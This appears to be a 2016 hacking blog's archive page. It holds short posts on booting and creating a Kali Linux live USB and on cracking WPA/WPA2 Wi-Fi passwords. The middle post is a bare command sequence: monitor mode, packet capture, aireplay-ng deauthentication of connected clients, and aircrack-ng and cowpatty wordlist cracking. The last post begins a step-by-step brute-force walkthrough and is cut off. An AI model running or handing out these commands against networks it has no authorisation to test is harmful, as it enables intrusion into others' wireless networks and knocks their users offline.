Posts

Showing posts from March, 2016
TO BOOT KALI LINUX USING USB  >>first connect the usb to your pc and then power on the system >>then click f12 or f10 based on the system you are using. >>so you will be entering the boot menu >>then select the USB and then click enter and  >>thats it now u can use kali linux
Image
How to create a KALI LINUX LIVE USB A  verified  copy of the appropriate ISO image of the latest Kali build image for the system you’ll be running it on: see the details on  downloading official Kali Linux images . If you’re running under Windows, you’ll also need to download the  Win32 Disk Imager  utility.  A USB thumb drive, 4GB or larger. (Systems with a direct SD card slot can use an SD card with similar capacity. The procedure is identical.) Kali Linux Live USB Install Procedure Creating a Bootable Kali USB Drive on Windows Plug your USB drive into an available USB port on your Windows PC, note which drive designator (e.g. “F:\”) it uses once it mounts, and launch the Win32 Disk Imager software you downloaded. Choose the Kali Linux ISO file to be imaged and verify that the USB drive to be overwritten is the correct one. Click the “Write” button. Once the imaging is complete, safely eject the USB drive from the Windows machine. You can now use the USB device to boot

Hack WPA & WPA2 USING KALI LINUX

COMMANDs TO CRACK WPA & WPA2 using kali linux: airmon-ng  sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo ifconfig wlan0 up airodump-ng wlan0  airodump-ng -c [channel id] --write [any name] --bssid [bssid of the wifi] wlan0 aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0 aircrack-ng -w [wordlist file] -b [bssid] [any name]-01.cap sudo ifconfig wlan0 down sudo iwcofnig wlan0 mode monitor sudo ifconfig wlan0 up  crack wpa/wpa2-with-cowpatty-and-negpmk-on-kali-linux airmon-ng  sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo ifconfig wlan0 up airodump-ng wlan0  airodump-ng -c [channel id] --write latesthackingnews --bssid [bssid of the wifi] wlan0 aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0  cowpatty -f darkc0de.lst -r latesthackingnews -s [ESSID of the wifi] genpmk -f darkc0de.lst -d pregendump -s [ESSID of the wifi] cowpatty -d pregendump -r latesthackingnews-01.cap -s [ESSID of the wifi]  sudo ifconfig wla
Image
BRUTE FORCE Cracking WPA/WPA2 – PSK Encryption I’m going to hack into a Wi-Fi hotspot that I just set up, named – Anonymus. Now, given that we have Kail Linux, open up a terminal window, type in “ifconfig “. This is going to list all the networking interfaces connected to your device. Here, we only need (wlan0) which is our Wi-Fi card, so we can disable the others by doing “ifconfig <name of the interface> down”. (“lo” does no matter)… Now, we type “airmon-ng start wlan0” (airmon-ng is just a tool for monitoring air traffic, “start” basically starts the tool, and “wlan0” specifies the interface we are using for monitoring) It’ll probably show “some processes that could cause trouble”, we’ll simply kill those processes by entering “kill <process ID>”. Now if we do “ifconfig”, it should show us the newly made monitoring interface “mon0”. Then, put in, “airodump-ng mon0”. In the screenshot below, the highlighted bssid is our target (and it is my o